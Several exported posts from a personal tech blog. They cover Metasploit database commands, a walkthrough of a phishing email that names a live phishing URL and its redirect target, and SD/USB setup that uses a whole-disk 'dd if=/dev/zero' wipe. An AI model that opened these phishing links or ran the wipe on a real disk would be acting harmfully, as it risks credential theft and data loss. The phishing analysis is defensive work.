<li><p>(in msfconsole)</p>
<pre><code>msf > resource my_script.rc
</code></pre></li>
</ol>
<h3 id="database">Database</h3>
<p>When conducting a penetration test, it is frequently a challenge to keep track o feverything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has build-in support for the PostreSQL database system. (<a href="https://www.offensive-security.com/metasploit-unleashed/database-introduction/">Reference</a>)</p>
<p>Here are some helpful commands:</p>
<ul>
<li><code>help database</code></li>
<li><code>hosts</code></li>
<li><code>services</code></li>
<li><code>db_nmap</code>: same as nmap but results will be saved in to current database</li>
<li><code>db_import</code></li>
<li><code>db_export -f xml [filepath for xml]</code></li>
</ul>
<h3 id="conclusion">Conclusion</h3>
<p>Metasploit is a powerful tool that allows people can raise attacks with the aid of its exploit database. Although this post only contains the basic usages of Metasploit with one example which is hardly to describe its strength, I will keep update this post if I found anything new and worth sharing.</p>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-82654613792850123372016-02-12T15:06:00.000+08:002016-02-12T15:06:06.084+08:00Fishing EmailI got an email today which looks like a spam mail. However, Google didn't mark it as a spam, which they usually do. So, I took a small note on understand this email.<h3>
Email</h3>
<div>
Instead of using super attractive words, the content was saying that I have to logged in somewhere in order to get my mails back. However, I checked the sender's domain, "hawaiiantel.net", and I am sure that I've never used any service from them. To talk more regarding to this, sometimes, we can't even fully trust that people won't send out spams from domains "look safe". That is, even if the domain is sent from someone we know, we still have to be careful.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfFTkwde4DUMXgAk2kedKbiqInBdPIUxsMsHm8A-Y16canSB9PTTfcc_7DEpFx5aXChyPAV_htqDK4lJtAxY0WWAxOTdTWBWkCBxMcTDLq3nHX7Qt5MiwJEnLxmJ0KiW3rRqjwNFIz5Tae/s1600/Screen+Shot+2016-02-12+at+2.04.42+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfFTkwde4DUMXgAk2kedKbiqInBdPIUxsMsHm8A-Y16canSB9PTTfcc_7DEpFx5aXChyPAV_htqDK4lJtAxY0WWAxOTdTWBWkCBxMcTDLq3nHX7Qt5MiwJEnLxmJ0KiW3rRqjwNFIz5Tae/s640/Screen+Shot+2016-02-12+at+2.04.42+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<h3>
External Link</h3>
<div>
Don't click on the link if we don't trust it at this point. Copy the link and read it in order to understand who's hosting the link. What I got is "http://ow.ly/YeNWT", which looks like a shorten URL hiding the real URL. Normal people rarely do this since there's no benefit in this case, also, it's always better to use URLs with the company's domain so that people can trust.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx1k22iHPDLlVGXQgf6l6aZB3J8wV54QyaSN2rG7_c8r4bMTyEozr_xq8Z0tZSoUfp5rB0vKkn_0Jt5nffLzZfC-HX2sNE3Gp5SkF3Iu8zKhMaEq4azWdbCTTufWp6tgXH7DgU_F9MtgH9/s1600/Screen+Shot+2016-02-12+at+1.58.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx1k22iHPDLlVGXQgf6l6aZB3J8wV54QyaSN2rG7_c8r4bMTyEozr_xq8Z0tZSoUfp5rB0vKkn_0Jt5nffLzZfC-HX2sNE3Gp5SkF3Iu8zKhMaEq4azWdbCTTufWp6tgXH7DgU_F9MtgH9/s640/Screen+Shot+2016-02-12+at+1.58.07+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
So, instead of using my original browser, which contains all my cookies of different websites. I used "<a href="https://www.torproject.org/projects/torbrowser.html.en">Tor Browser</a>" to keep myself safe.</div>
<div>
<br /></div>
<h3>
Analysis The Site - Routing</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Fw4d5Co_L6W-eSPMISaR4DbvzUGblZceyW4RTm78c9wbtyc9Z-z8XErhotmC6Qm2Rn2T9ObQNU_tsU2w66-FNm_bpWQrYfjZr74dUvYZFQD4Clxd5nxu5BAP0L0Ha6dR0ztrIPBBfk5_/s1600/Screen+Shot+2016-02-12+at+1.58.43+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Fw4d5Co_L6W-eSPMISaR4DbvzUGblZceyW4RTm78c9wbtyc9Z-z8XErhotmC6Qm2Rn2T9ObQNU_tsU2w66-FNm_bpWQrYfjZr74dUvYZFQD4Clxd5nxu5BAP0L0Ha6dR0ztrIPBBfk5_/s640/Screen+Shot+2016-02-12+at+1.58.43+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
After seeing the page on Tor Browser. It's almost 100% sure that this is a fishing site. However, in order to understand it more. We can track how its URL routing works using following information:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
> wget http://ow.ly/YeNWT<br />--2016-02-12 14:17:58-- http://ow.ly/YeNWT<br />Resolving ow.ly (ow.ly)... 54.67.120.65, 54.183.130.144, 54.183.131.91, ...<br />Connecting to ow.ly (ow.ly)|54.67.120.65|:80... connected.<br />HTTP request sent, awaiting response... 301 Moved Permanently<br />Location: http://hannahreade.co.uk/WT/orin.htm [following]<br />--2016-02-12 14:17:59-- http://hannahreade.co.uk/WT/orin.htm<br />Resolving hannahreade.co.uk (hannahreade.co.uk)... 50.115.112.7<br />Connecting to hannahreade.co.uk (hannahreade.co.uk)|50.115.112.7|:80... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 102999 (101K) [text/html]</blockquote>
</div>
<div>
By requesting "http://ow.ly/YeNWT", I was redirected to "http://hannahreade.co.uk/WT/orin.htm". "hannahreade.co.uk" looks like a normal website, and if so, the site may be hacked.</div>
<div>
<br /></div>
<h3>
Analysis The Site - Purpose</h3>
<div>
Like most fishing websites, the purpose of the sites is trying to get the user's accounts with passwords by faking the site. The site looks totally the same as Google login page; however nothing is actually the same besides its layout. We can learn this simply by reading the URL, or by typing wrong passwords and see what will happen.</div>
<div>
<br /></div>
<div>
In this case, I can login without typing a correct password. And, their second page is requesting my cell phone number. Of course, I can go onto next page by giving a reason cell number (even with a wrong phone number format). Then, the site gave me a blank page after I giving all these informations, which is the way the do usually. Therefore, the user may just got confused and ignored this without thinking too much, while the account username and password was sent to the attacker.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXr6r8jUhRYuYkCCa8x_b4fs9CEUxz1zYQd8PLc9xZaf5KpuZdGnDYbwiHC07Im_B8CFLhVGT8nEXPPDPJ0dBUMYb-k5ZGH2iGF0AVaeCWooXazDg9ddmg3guUoyj_cppXkspuYNf17KZ9/s1600/Screen+Shot+2016-02-12+at+1.59.23+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXr6r8jUhRYuYkCCa8x_b4fs9CEUxz1zYQd8PLc9xZaf5KpuZdGnDYbwiHC07Im_B8CFLhVGT8nEXPPDPJ0dBUMYb-k5ZGH2iGF0AVaeCWooXazDg9ddmg3guUoyj_cppXkspuYNf17KZ9/s640/Screen+Shot+2016-02-12+at+1.59.23+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<h3>
Analysis The Site - Code</h3>
<div>
It's pretty much so far; however, it is still nice if I can go through their code a little bit. After I did "wget" their fishing site. I got the raw file of its site. And, this is its second line:</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<meta http-equiv="Refresh" content="1; url=data:text/html;base64, 77u/IA0KPC...</blockquote>
<div>
<br /></div>
<div>
The site is redirected to another URL, "data:text/html;base64, ....", which isn't a hyperlink to another site but a site that contains itself in the URL as a raw string. And, by opening the URL in browser, the raw string will be parsed back to HTML format.</div>
<div>
<br /></div>
<div>
However, part of the code was an <a href="http://stackoverflow.com/questions/21762076/why-does-gmail-use-eval">encoded JS code</a> which hides the further information.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxWZYDhyphenhyphenPPZYSd3z67hWBuXlyjSltDFT6gxhWtpdcvZISEyLJzjiJRVJtbnXhhojqnlYJ5nUvbOgVam-pUiVB8ZdBXT1E_kMsysLi_luGZHUD4QZj136jKRRuxzQ79vMbLd2xm9o8ODv1n/s1600/Screen+Shot+2016-02-12+at+2.45.50+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxWZYDhyphenhyphenPPZYSd3z67hWBuXlyjSltDFT6gxhWtpdcvZISEyLJzjiJRVJtbnXhhojqnlYJ5nUvbOgVam-pUiVB8ZdBXT1E_kMsysLi_luGZHUD4QZj136jKRRuxzQ79vMbLd2xm9o8ODv1n/s640/Screen+Shot+2016-02-12+at+2.45.50+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
To find out the attacker, we can simply decode everything on the site, or we can monitoring the package transits between any external services and my laptop. However, I am not going into this now, and may continue this work another day.</div>
<div>
<br /></div>
<h3>
Sum Up</h3>
<div>
Spam doesn't harm if you understand what's going on. In the case here, we can learn that we should:</div>
<div>
<ul>
<li>check the sender's domain</li>
<li>open suspicious URL in Tor Browser</li>
<li>be ware of the URL</li>
<li>mark spams on your Gmail if you found one, which makes Google stop it spreading to other people</li>
</ul>
</div>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-29011270446161864842015-12-13T11:10:00.000+08:002015-12-13T11:10:06.473+08:00Setting Up Raspberry Pi<h3>
Preface</h3>
Cool, I've tried Arduino, BeagleBone, and STM boards before, but this would be my first experience in coding on Raspberry Pi, which quite famous and cheap as well. In this post, I would write down my steps for setting up Raspbian, a Linux distribution designed for Raspberry Pi. Although there are already tons of tutorial regarding to this, I will include some troubleshooting as well.<br />
<br />
<h3>
Equipments</h3>
<ol>
<li>Raspberry Pi Model B</li>
<li>HDMI Cable</li>
<li>Monitor supports HDMI</li>
<li>MicroSD Card (at least 8G)</li>
<li>USB Keyboard / USB Mouse</li>
<li>USB wireless adapter - Edimax EW-7811UN</li>
<li>USB Cable (A type to Micro)</li>
</ol>
<div>
<br /></div>
<h3>
Steps</h3>
<h4>
Build OS Image on SD Card</h4>
<div>
Normally, this step should be easy, only one or two commands are needed to get a SD with our OS in it. However, I found a problem while doing this step this time - my SD card is in read-only mode. Usually, this is cause by the physical lock switch on the card; however, no matter I switch it on or off, it's always locked. By applying the commands I noted in the <a href="http://heron-note.blogspot.tw/2015/10/usb-formatting-to-support-windows-using.html">last post</a>, we can learn its details:</div>
<blockquote>
<b>> diskutil info disk2</b><br />
Device Identifier: disk2<br />
Device Node: /dev/disk2<br />
Whole: Yes<br />
Part of Whole: disk2<br />
Device / Media Name: SD Card Reader<br />
Volume Name: Not applicable (no file system)<br />
Mounted: Not applicable (no file system)<br />
File System: None<br />
Content (IOContent): FDisk_partition_scheme<br />
OS Can Be Installed: No<br />
Media Type: Generic<br />
Protocol: USB<br />
SMART Status: Not Supported<br />
Total Size: 15.9 GB (15931539456 Bytes) (exactly 31116288 512-Byte-Units)<br />
Volume Free Space: Not applicable (no file system)<br />
Device Block Size: 512 Bytes<br />
Read-Only Media: Yes<br />
Read-Only Volume: Not applicable (no file system)<br />
Device Location: Internal<br />
Removable Media: Yes<br />
Media Removal: Software-Activated<br />
Virtual: No<br />
OS 9 Drivers: No<br />
Low Level Format: Not supported</blockquote>
<br />
And, whenever I tried to format or write onto the card, I got:<br />
<br />
<blockquote class="tr_bq">
<b>> sudo -s -- 'dd bs=1m if=/dev/zero of=/dev/disk2'</b><br />
Password:<br />
dd: /dev/disk2: Permission denied</blockquote>
<br />
After several trials and Googling, I found the problem is caused by the adaptor that adapts the small Micro SD back to the normal size where its switch isn't functioning well. Funny discussion regarding to this issue can be found online, such as <a href="https://www.raspberrypi.org/forums/viewtopic.php?f=91&t=104006">"it worked when it was about 75% towards the unlocked position, but you might need to fiddle with it a bit"</a>. No matter how I place the switch lock, it never works.<br />
<br />
So, I then brought a small Micro SD Card Reader, which costs around USD2.5, and it fixes all the problem nicely.<br />
<br />
<blockquote class="tr_bq">
<b>> diskutil info disk3</b><br />
Device Identifier: disk3<br />
Device Node: /dev/disk3<br />
Whole: Yes<br />
Part of Whole: disk3<br />
Device / Media Name: STORAGE DEVICE<br />
Volume Name: Not applicable (no file system)<br />
Mounted: Not applicable (no file system)<br />
File System: None<br />
Content (IOContent): FDisk_partition_scheme<br />
OS Can Be Installed: No<br />
Media Type: Generic<br />
Protocol: USB<br />
SMART Status: Not Supported<br />
Total Size: 15.9 GB (15931539456 Bytes) (exactly 31116288 512-Byte-Units)<br />
Volume Free Space: Not applicable (no file system)<br />
Device Block Size: 512 Bytes<br />
Read-Only Media: No<br />
Read-Only Volume: Not applicable (no file system)<br />
Device Location: External<br />
Removable Media: Yes<br />
Media Removal: Software-Activated<br />
Virtual: No<br />
OS 9 Drivers: No<br />
Low Level Format: Not supported<br />
~<br />
<b>> diskutil unmountDisk /dev/disk3</b><br />
Unmount of all volumes on disk3 was successful<br />
~<br />
<b>> sudo -s -- 'dd bs=1m if=/Users/heron/Desktop/2015-11-21-raspbian-jessie-lite.img | pv | dd of=/dev/disk3'</b></blockquote>
I am using pv in the middle instead of barely using dd is because that dd doesn't show the process bar, which is hard for me to know how long will it take, and how much is done.<br />
<h4>
Power Up</h4>
<div>
Basically, the followings would be easy and we are already about to finish. Plug in the cables as below, and it will power up right after the micro USB is plugged in.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfm81kod63gTsKro7bopRBpcUckh8jC6kMKlBvN_yRyibf7vK99CgGVJmzIydqzNazKV6ydn5Pu0mpUrF4cJAUvbzsRKPsXDniFrz8MAR5OKE6i-PBEc0ueFb3KoMJARgJFMStsboq147O/s1600/IMG_20151213_105718.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfm81kod63gTsKro7bopRBpcUckh8jC6kMKlBvN_yRyibf7vK99CgGVJmzIydqzNazKV6ydn5Pu0mpUrF4cJAUvbzsRKPsXDniFrz8MAR5OKE6i-PBEc0ueFb3KoMJARgJFMStsboq147O/s640/IMG_20151213_105718.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
From the photo, one can see that I have:</div>
<div>
<ul>
<li>1 Micro USB for power</li>
<li>1 HDMI for display</li>
<li>2 Logitech Unifying Receiver for keyboard and mouse</li>
<li>1 USB wireless adapter for Wifi</li>
<li>1 USB microphone (for application purpose)</li>
</ul>
<h4>
Keyboard Layout Issue</h4>
</div>
<div>
Everything should be set so far, and if you're using <a href="https://www.raspberrypi.org/downloads/noobs/">NOOBS system installer</a>, it will do rest of the jobs. The only thing is you have to do is to select your settings or system you wish to install.</div>
<div>
<br /></div>
<div>
However, there's one issue I found when I just setup Raspbian, the operating system designed for Raspberry Pi based on Debian. It's using different keyboard layout which is a general one that I used to. So, to fix the problem, we have to fire up keyboard-configuration and pick the right setting. Steps are in <a href="http://thepihut.com/blogs/raspberry-pi-tutorials/25556740-changing-the-raspberry-pi-keyboard-layout">this link</a>. The settings will start to affect only after reboot.<br />
<br /></div>
<h3>
Reference</h3>
<ul>
<li><a href="https://www.raspberrypi.org/forums/viewtopic.php?f=91&t=104006">Mac SD card creation problem, Error: -69877: (solved)</a></li>
<li><a href="http://thepihut.com/blogs/raspberry-pi-tutorials/25556740-changing-the-raspberry-pi-keyboard-layout">Changing the Raspberry Pi Keyboard Layout</a></li>
</ul>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-34003317486973943102015-12-12T22:41:00.000+08:002015-12-12T22:45:22.257+08:00Convert GIF Background from Transparency to a Solid Color<h3>
Preface</h3>
Last day, I got a new Pebble watch, then I started to code something on it. Within one day, I've tried out its dictation API with a small but fun app. Also, I wrote a watchface which has a circle progress bar showing the percentage of the time had past today (the idea is from one of Apple Watch watchface, <a href="http://www.apple.com/watch/watch-reimagined/">"Solar"</a>).<br />
<br />
However, when I was trying to put the animation on my watchface, it requires an "Animated Portable Network Graphics (APNG) file format" with solid color background. Therefore, I have to somehow find a way to convert one GIF file I have into that format while my GIF file is having a transparent background.<br />
<br />
<h3>
Steps</h3>
<div>
"Convert" written by ImageMagick is a powerful tool in this situation, I've been using it from the first year I started to use unix-like systems. To install (for Mac):</div>
<blockquote class="tr_bq">
<b>> sudo port install ImageMagick</b></blockquote>
<div>
To fill solid background (I use black here) on my GIF file:</div>
<blockquote class="tr_bq">
<b>> convert input.gif -background black -alpha remove result.gif</b></blockquote>
where option background sets the color of background, and option alpha is set to "remove" for removing its transparency.<br />
<br />
And, to convert GIT file into APNG file, we can use a tool called gif2apng. It can be downloaded <a href="http://gif2apng.sourceforge.net/">here</a>. How I use it is written below:<br />
<blockquote class="tr_bq">
<b>> unzip gif2apng-1.9-bin-macosx.zip</b><br />
<b>> cp gif2apng ~/bin</b><br />
<b>> export PATH=~/bin:$PATH</b> # this depends on the setting you prefer, I like to put this kind of tool under ~/bin<br />
<b>> gif2apng result.gif result.png</b><br />
<br />
gif2apng 1.9 using 7ZIP with 15 iterations<br />
<br />
Reading 'result.gif'...<br />
9 frames.<br />
Writing 'result.png'...<br />
9 frames.</blockquote>
<div>
<h3>
More</h3>
One to step to go in order to fit into the Pebble Watch, which may be a little irrelevant to this post. I have to crop the image since it's too big. And, what I wanted to do is to remove the upper part. It's originally at size of 100 * 120, and I would like it became 100 * 100. So, there's the magic:<br />
<blockquote class="tr_bq">
<b>> convert input.gif -coalesce -repage 0x0 -crop 100x100+0+20 +repage result.gif</b></blockquote>
Finally, we can combine all together as below:<br />
<blockquote class="tr_bq">
<b>> convert input.gif -coalesce -repage 0x0 -crop 100x100+0+20 +repage -background black -alpha remove result.gif; gif2apng result.gif input.png</b></blockquote>
</div>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-43729087257459831792015-10-11T17:41:00.001+08:002015-10-11T17:41:13.085+08:00USB Formatting to Support Windows using Mac Command Line Tool<h3 class="tr_bq">
Abstract</h3>
It's an annoying problem that Windows isn't support much filesystem formats; thus, usually we meet problems when we plug our USB flash disk, which was formatted by Mac, into Windows machines. Although it seems that this can be solved easily by formatting the disk again to FAT or exFAT, still different problems will exist, such as different version of Windows supporting different types of filesystem, etc.<br />
<br />
Anyway, I am writing this post to record how I solved this problem efficiently, so it may help someone or myself in the future.<br />
<br />
<h3>
Steps</h3>
<h4>
A. Locate disk identifier</h4>
<blockquote class="tr_bq">
<b>> diskutil list</b><br />...<br />/dev/disk4 (external, physical):<br /> #: TYPE NAME SIZE IDENTIFIER<br /> 0: FDisk_partition_scheme *8.0 GB disk4<br /> 1: DOS_FAT_32 HERON 8.0 GB disk4s1</blockquote>
<h4>
B. Check Status</h4>
If you want to read the information about the disk:<br />
<blockquote>
<b>> diskutil info <u><i>disk4</i></u></b><br /> Device Identifier: disk4<br /> Device Node: /dev/disk4<br /> Whole: Yes<br /> Part of Whole: disk4<br /> Device / Media Name: SanDisk Cruzer Fit Media<br /> Volume Name: Not applicable (no file system)<br /> Mounted: Not applicable (no file system)<br /> File System: None<br /> Content (IOContent): FDisk_partition_scheme<br /> OS Can Be Installed: No<br /> Media Type: Generic<br /> Protocol: USB<br /> SMART Status: Not Supported<br /> Total Size: 8.0 GB (8004304896 Bytes) (exactly 15633408 512-Byte-Units)<br /> Volume Free Space: Not applicable (no file system)<br /> Device Block Size: 512 Bytes<br /> Read-Only Media: No<br /> Read-Only Volume: Not applicable (no file system)<br /> Device Location: External<br /> Removable Media: Yes<br /> Media Removal: Software-Activated<br /> Virtual: No<br /> OS 9 Drivers: No<br /> Low Level Format: Not supported</blockquote>
<h4>
C. Verify Volumes</h4>
If you want to verify if there's any issue of the current disk:<br />
<blockquote class="tr_bq">
<b>> diskutil verifyVolume /Volumes/<u><i>HERON</i></u></b><br />Started file system verification on disk4s1 HERON<br />Verifying file system<br />** /dev/rdisk4s1<br />** Phase 1 - Preparing FAT<br />** Phase 2 - Checking Directories<br />** Phase 3 - Checking for Orphan Clusters<br />79 files, 7800596 KiB free (1950149 clusters)<br />File system check exit code is 0<br />Finished file system verification on disk4s1 HERON</blockquote>
<h4>
D. Repairing Volumes</h4>
If you found any problem and want to repair the disk:<br />
<blockquote class="tr_bq">
<b>> diskutil repairVolume /Volumes/HERON</b><br />Started file system repair on disk4s1 HERON<br />Repairing file system<br />** /dev/rdisk4s1<br />** Phase 1 - Preparing FAT<br />** Phase 2 - Checking Directories<br />** Phase 3 - Checking for Orphan Clusters<br />77 files, 7800608 KiB free (1950152 clusters)<br />File system check exit code is 0<br />Updating boot support partitions for the volume as required<br />Finished file system repair on disk4s1 HERON</blockquote>
<h4>
E. Format</h4>
To format the disk in order to support Windows' FAT:<br />
<blockquote class="tr_bq">
<b>> diskutil eraseDisk MS-DOS HERON_2 /dev/disk4</b><br />Started erase on disk4<br />Unmounting disk<br />Creating the partition map<br />Waiting for the disks to reappear<br />Formatting disk4s2 as MS-DOS (FAT) with name HERON_2<br />512 bytes per physical sector<br />/dev/rdisk4s2: 15191032 sectors in 1898879 FAT32 clusters (4096 bytes/cluster)<br />bps=512 spc=8 res=32 nft=2 mid=0xf8 spt=32 hds=255 hid=411648 drv=0x80 bsec=15220736 bspf=14836 rdcl=2 infs=1 bkbs=6<br />Mounting disk<br />Finished erase on disk4</blockquote>
To learn filesystems that supported by diskutil:<br />
<blockquote class="tr_bq">
<b>> diskutil listFilesystems</b><br />Formattable file systems<br />These file system personalities can be used for erasing and partitioning.<br />When specifying a personality as a parameter to a verb, case is not considered.<br />Certain common aliases (also case-insensitive) are listed below as well.<br />-------------------------------------------------------------------------------<br />PERSONALITY USER VISIBLE NAME<br />-------------------------------------------------------------------------------<br />ExFAT ExFAT<br />Free Space Free Space<br /> (or) free<br />MS-DOS MS-DOS (FAT)<br />MS-DOS FAT12 MS-DOS (FAT12)<br />MS-DOS FAT16 MS-DOS (FAT16)<br />MS-DOS FAT32 MS-DOS (FAT32)<br /> (or) fat32<br />HFS+ Mac OS Extended<br />Case-sensitive HFS+ Mac OS Extended (Case-sensitive)<br /> (or) hfsx<br />Case-sensitive Journaled HFS+ Mac OS Extended (Case-sensitive, Journaled)<br /> (or) jhfsx<br />Journaled HFS+ Mac OS Extended (Journaled)<br /> (or) jhfs+</blockquote>
If you are using GUI disk utility, make sure you picked "Master Boot Record":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEy4bHgwhvg9AlL7N1xWb2jl3CTeQPVb_zCvmiz975pYVx1N1ytwdyoAMItYF3a0fcujfW_H_7MjmIR2K6Nt1bZn-SUKt1DDsd7nOCzIjoLCnpVszs-Y6zlPseArvsQnrgNA1-2IIGJGx1/s1600/Screen+Shot+2015-10-11+at+5.34.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEy4bHgwhvg9AlL7N1xWb2jl3CTeQPVb_zCvmiz975pYVx1N1ytwdyoAMItYF3a0fcujfW_H_7MjmIR2K6Nt1bZn-SUKt1DDsd7nOCzIjoLCnpVszs-Y6zlPseArvsQnrgNA1-2IIGJGx1/s640/Screen+Shot+2015-10-11+at+5.34.00+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Just in case that you found unable to unmount volume error, make sure you're not in volume folder when diskutil is trying to umount:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="clear: both;">
<i>/Volumes/HERON_2</i><br /><b>> diskutil verifyVolume /Volumes/HERON</b><br />Unable to find disk for /Volumes/HERON<br /><i>/Volumes/HERON_2</i><br /><b>> diskutil verifyVolume /Volumes/HERON_2</b><br />Started file system verification on disk4s2 HERON_2<br />Error: -69673: Unable to unmount volume for repair<br /><i>/Volumes/HERON_2</i><br /><b>> diskutil verifyVolume /Volumes/HERON_2</b><br /><i>/Volumes/HERON_2</i><br /><b>> cd ..</b><br /><i>/Volumes</i><br /><b>> diskutil verifyVolume /Volumes/HERON_2</b><br />Started file system verification on disk4s2 HERON_2<br />Verifying file system<br />** /dev/rdisk4s2<br />** Phase 1 - Preparing FAT<br />** Phase 2 - Checking Directories<br />** Phase 3 - Checking for Orphan Clusters<br />83 files, 7594648 KiB free (1898662 clusters)<br />File system check exit code is 0<br />Finished file system verification on disk4s2 HERON_2</blockquote>
<h3>
Reference</h3>
<div>
<ul>
<li><a href="http://www.theinstructional.com/guides/disk-management-from-the-command-line-part-1">Disk Management From the Command-Line, Part 1</a></li>
<li><a href="http://coolestguidesontheplanet.com/format-usb-external-disk-mac-osx-using-disk-utility/">How to format a USB external disk for Mac OSX using Disk Utility</a></li>
</ul>
</div>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com1tag:blogger.com,1999:blog-3461379477139754715.post-41798182626669270982015-09-04T11:00:00.000+08:002015-09-04T11:00:04.944+08:00Adobe Reader DC Update - Network Security Importance<h3>
Preface</h3>
Today, people in MOI put quite a lot of effect on updating Adobe Reader DC to the latest version. And, in this post, I would like to discuss the importance of updating software like this from security viewpoint, as well as the methods we can apply to update softwares for a bunch of computers efficiently.<br />
<br />
<h3>
Adobe Reader DC Update - Introduction</h3>
<div>
To discuss the importance of the update, we first have to find out what's new in <a href="http://www.adobe.com/devnet-docs/acrobatetk/tools/ReleaseNotes/DC/dccontinuousjuly2015.html">the latest update</a> (take 15.008.20082 planned update as example here). Then, we look into the security part (ignore the new features, bugs, etc), and take version 2015.007.20033 as affected version where we can get a list of <a href="https://helpx.adobe.com/security/products/acrobat/apsb15-15.html">CVE numbers</a>.</div>
<div>
<br /></div>
<div>
Adobe listed out all the security issues (Common Vulnerabilities and Exposures, CVE) that affects to certain version of their Reader DC software, which look like: CVE-2014-0566, CVE-2014-8450, CVE-2015-3095, CVE-2015-4435, CVE-2015-4438, CVE-2015-4441, CVE-2015-4443, ... etc.</div>
<div>
<br /></div>
<div>
Each CVS indicates one security problem. For example, CVE-2014-0566 causes memory corruption vulnerabilities that could lead to code execution, CVE-2014-8450 causes security bypass vulnerabilities that could lead to information disclosure, etc. Any of these CVSs may be a huge security issue that may cause hackers to execute programs without permission.</div>
<div>
<br /></div>
<h3>
Adobe Reader DC Update - Methods</h3>
<div>
For sure, the most basic solution is to check "Check for Updates" in Adobe Reader. However, here I would like to discuss the methods applied by IT administrators which applies updates onto multiple computers in the same time. (Although I am not familiar with Windows enough, I am discussion the things in Windows environment since that's the environment I am facing recently.)</div>
<h4>
Method 1 - AIP-GPO</h4>
<div>
AIP-GPO stands for Administrative Install Point deployed via Group Policy Objects. So, it should be divided into two parts for discussion.</div>
<div>
<br /></div>
<div>
<u>AIP</u> is a special directory created by extracting the contents of a self-contained MSI-file into a previously empty directory with the command 'msiexec /a' (applies the administrative installation option). For msp patch files, you have to run 'msiexec /p' later on to attach onto the just-applied msi file.</div>
<div>
<br /></div>
<div>
<u>GPO</u> are used to distribute settings to windows PCs that are members of a domain from a windows server. After the initial setups for GPO, you can simply select the AIP folder and apply the change. Users under a GPO policy will now get the latest update after the group policy refreshes and a computer restart.</div>
<div>
<br /></div>
<div>
* Without a real hands-on operation of AIP-GPO, I am not sure how does GPO find AIP folders, and how good is this solution.</div>
<h4>
Method 2 - Bootstrapper</h4>
<div>
Any setup.exe or any other executable that installs updates and launches the MSI installer is a Bootstrapper. Under Adobe's document, we can learn the following benefits of using Bootstrapper:</div>
<div>
<ul>
<li>Detects whether the required Windows Installer (MSI) is available and installs it if it isn’t.</li>
<li>Detects whether the product is already installed and only proceeds if it does not exist on the target machine.</li>
<li>Provides binary installations where the entire installer is supplied and run by each machine.</li>
<li>Provides a simple way to chain updates in the required order by simply adding the msp to the installer folder and modifying Setup.ini to apply that patch.</li>
<li>It is not subject to the patch constraint that limits an AIP from installing a quarterly update over a out of cycle patch. Thus, installs can always have the latest update without starting over.</li>
</ul>
</div>
<div>
So, for our purpose, we can simply add the msp file to the installer folder and modify Setup.ini to apply the latest Adobe Reader update.</div>
<div>
<br /></div>
<div>
* Without having enough information, I am not sure how this solution applies to multiple machines in the same time. So far, I assume bootstrapper should be a way to install/manage updates via command line; therefore, I think, to distribute the updates onto multiple machines, we have to distribute the msp file first, then run setup.exe on each machine remotely.</div>
<h4>
Method 3 - SCUP/SCCM</h4>
<div>
